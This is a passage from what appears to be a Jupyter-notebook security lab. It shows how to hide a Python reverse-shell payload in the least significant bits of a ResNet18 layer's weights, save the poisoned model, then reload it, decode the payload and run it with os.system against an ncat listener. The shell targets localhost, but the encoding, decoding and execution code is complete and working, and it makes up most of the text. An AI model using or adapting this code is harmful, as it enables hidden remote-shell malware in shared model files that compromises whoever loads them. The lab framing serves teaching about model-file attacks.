['0', '1', '1', '0', '0', '0', '1', '1', '0', '1', '0', '0', '1', '0', '0', '0', '0', '1', '1', '0', '1', '1', '0', '0', '0', '0', '1', '1', '0', '0', '0', '0', '0', '1', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '1', '1', '1', '0', '0', '1', '1', '1', '0', '0', '1', '0', '1', '1', '1', '0', '1', '0', '1', '0', '1', '0', '0', '1', '0', '0', '1', '0', '1', '0', '0', '0', '0', '1', '1', '0', '0', '1', '1', '0', '0', '0', '1', '0', '1', '1', '0', '1', '0', '1', '0', '0', '1', '0', '0', '1', '0', '0', '1', '0', '1', '0', '0', '0', '0', '1', '1', '0', '1', '1', '0', '0', '1', '0', '0', '0', '1', '1', '0', '1', '0', '0', '0', '0', '1', '0', '1', '0', '0', '0', '0', '0', '1', '0', '1', '0', '1', '1', '0', '0', '0', '1', '1', '1', '0', '0', '1', '0', '1', '1', '0', '0', '1', '1', '0', '0', '1', '1', '0', '0', '0', '0', '1', '0', '1', '0', '1', '0', '1', '1', '1', '0', '0', '1', '1', '0', '0', '0', '1', '0', '1', '1', '1', '0', '1', '1', '1', '0', '1', '1', '0', '0', '0', '1', '0',

(None, 2016)

In [123]:
# Let's wrap this up with a function to recover the string
# 8 bits make a byte, hence we are going through this in groups of 8
# All of this could be done on one line, just keeping it simple by having multiple lines
# Insert print statements before and after if you wish to see what is going on
# Do keep in mind, this process was already done above.

def recover_final_data(data:list=[]):
    str_array = [get_lsbs[i:i+8  ] for i in range(0, len(get_lsbs), 8)]
    bits_joined = [ ''.join(i) for i in str_array ]
    b64_payload = ''.join([chr(int(i, base=2)) for i in bits_joined])
    data_decoded = base64.b64decode(s=b64_payload)
    return data_decoded

In [124]:
# Call the function
recover_final_data(data=get_lsbs)

b'python -c \'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("127.0.0.1",9999));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")\'&'

Remember to setup your listener   

$ ncat --verbose --listen 9999   
Ncat: Version 7.94SVN ( https://nmap.org/ncat )   
Ncat: Listening on [::]:9999   
Ncat: Listening on 0.0.0.0:9999   

In [125]:
# If we wanted to, we can now execute our code
# ncat --verbose --listen 9999

os.system(command=recover_final_data(data=get_lsbs))

0

There we go!!

### Lab Takeaways:  
- We were able to perform LSB steganography  
- We did the encoding process   
- We did the decoding process   
- We leveraged ncat as a listener to access a reverse shell   


### Wrapping it up
Let's put everything together 

# Encoding process

In [126]:
import torch
from torchvision.models import resnet18, ResNet18_Weights
import struct
import base64
import numpy as np
import os


model = resnet18(weights=ResNet18_Weights.DEFAULT)
model.eval()

conv_layer_extracted = model.layer4[0].conv2.weight.data.numpy()
conv_layer_shape = conv_layer_extracted.shape
conv_layer_flat = conv_layer_extracted.reshape(-1)

payload = b"""python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("127.0.0.1",9999));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'&"""
#payload_len = len(payload)

payload_b64_encoded = base64.b64encode(payload)
payload_encoded = np.frombuffer(payload_b64_encoded, dtype=np.uint8)
payload_len = payload_encoded.shape[0]

encoded_data_w_len = np.r_[[payload_len], payload_encoded]
encoded_data_w_len = np.array(encoded_data_w_len, dtype=np.uint8)

encoded_bits = np.unpackbits(encoded_data_w_len)
print(f'The number of bytes needed for encoding is: {len(encoded_bits)}')

bytes_manipulated = np.array([], dtype=np.int32)

for i in range(encoded_bits.size):
    bytes_manipulated = np.append(bytes_manipulated, struct.unpack('@i', struct.pack('@f', conv_layer_flat[i]))[0]).astype(np.int32)


bytesRounded = bytes_manipulated -  bytes_manipulated % 2
encoded_data = bytesRounded + encoded_bits

tmp_float = np.array([])
for idx, value in enumerate(encoded_data):
    tmp_float = np.append(tmp_float, struct.unpack('@f', struct.pack('@i', value))[0]).astype(np.float32)

conv_layer_flat[:tmp_float.size] = tmp_float

conv_layer = conv_layer_flat.reshape(conv_layer_shape)

conv_layer = torch.as_tensor(data=conv_layer, dtype=torch.float32)
model.layer4[0].conv2.weight.data = conv_layer

torch.save(obj=model, f=r'/tmp/model_stegoed.pt')

Traceback (most recent call last):
  File "<string>", line 1, in <module>
ConnectionRefusedError: [Errno 111] Connection refused


The number of bytes needed for encoding is: 2024


# Decoding Process

In [127]:
import torch
import struct
import base64
import numpy as np
import os

loaded_model = torch.load(f='/tmp/model_stegoed.pt', map_location='cpu', weights_only=False)

conv_layer_to_decode = loaded_model.layer4[0].conv2.weight.data.numpy()
conv_layer_to_decode = conv_layer_to_decode.reshape(-1)

get_content_length = conv_layer_to_decode[:8]

def convert_from_float_to_int(data:np.array=None):
    tmp_int = np.array([], dtype=np.int32)
    for i in range(len(data)):
        tmp_int = np.append(tmp_int, struct.unpack('@i', struct.pack('@f', data[i]))[0])

    return tmp_int

int_data_from_float = convert_from_float_to_int(get_content_length)

def get_lsb_status(int_data:np.array=None):
    c = np.array([], dtype=np.int32)
    for i in range(len(int_data)):
        c = np.append(arr=c, values=int_data[i] % 2).astype(str).tolist()

    return c

c = get_lsb_status(int_data=int_data_from_float)
payload_len_to_decode = int(''.join(c), base=2)

payload_to_decode = conv_layer_to_decode[8:payload_len_to_decode*8 + 8]
int_data_from_float = convert_from_float_to_int(data=payload_to_decode)
get_lsbs = get_lsb_status(int_data=int_data_from_float)

def recover_final_data(data:list=[]):
    str_array = [get_lsbs[i:i+8  ] for i in range(0, len(get_lsbs), 8)]
    bits_joined = [ ''.join(i) for i in str_array ]
    b64_payload = ''.join([chr(int(i, base=2)) for i in bits_joined])
    data_decoded = base64.b64decode(s=b64_payload)
    return data_decoded

# Remember to setup your listener
# ncat --verbose --listen 9999
os.system(command=recover_final_data(data=get_lsbs))

0

In [128]:
### Hope you enjoyed this lab!

Traceback (most recent call last):
  File "<string>", line 1, in <module>
ConnectionRefusedError: [Errno 111] Connection refused
